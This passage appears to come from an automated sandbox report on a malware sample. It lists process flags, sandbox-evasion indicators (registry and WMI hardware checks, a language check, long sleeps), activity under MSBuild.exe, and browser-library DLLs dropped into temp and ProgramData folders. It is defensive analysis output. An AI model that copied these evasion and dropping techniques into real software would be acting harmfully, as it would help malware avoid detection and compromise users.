                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-70428
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 16F0000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3200000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 5200000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: 2727BEA0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: 2727C020000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1710000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3460000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 5460000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4585
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4984
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWindow / User API: threadDelayed 4357
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWindow / User API: threadDelayed 5447
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-39119
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xtfkyJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dllJump to dropped file
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5ek.2\UIxMarketPlugin.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jwjqeqxJump to dropped file
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5ek.2\relay.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeAPI coverage: 9.8 %
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeAPI coverage: 7.5 %
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeAPI coverage: 2.4 %
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -25825441703193356s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -37885s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -60000s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -59858s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -59071s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -59696s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -59588s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -33910s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -59479s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -48915s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -59359s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -39508s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -59217s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -55432s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -57750s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -57559s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -44022s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -57416s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -52492s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -48862s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -57250s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -31123s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -57000s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -47980s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -56792s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -56671s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -43905s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -56546s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -56436s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -45398s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -56305s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -56198s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -48249s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -56089s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -45598s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -55984s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -41526s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -55874s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -59534s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -55764s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -55654s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -41943s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -55546s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -55437s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -43762s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -55327s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -55218s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -49672s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -55107s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -55000s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -54757s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -54878s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -58269s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -54765s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8064Thread sleep time: -54641s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -33748s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -47834s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -39808s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -59040s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -34516s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -35748s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -59284s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -36799s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -32306s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -58881s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -40674s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -59684s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -55447s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7828Thread sleep time: -55111s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 6704Thread sleep time: -19369081277395017s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 6728Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe TID: 7964Thread sleep count: 155 > 30
                          Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe TID: 7964Thread sleep time: -110205s >= -30000s
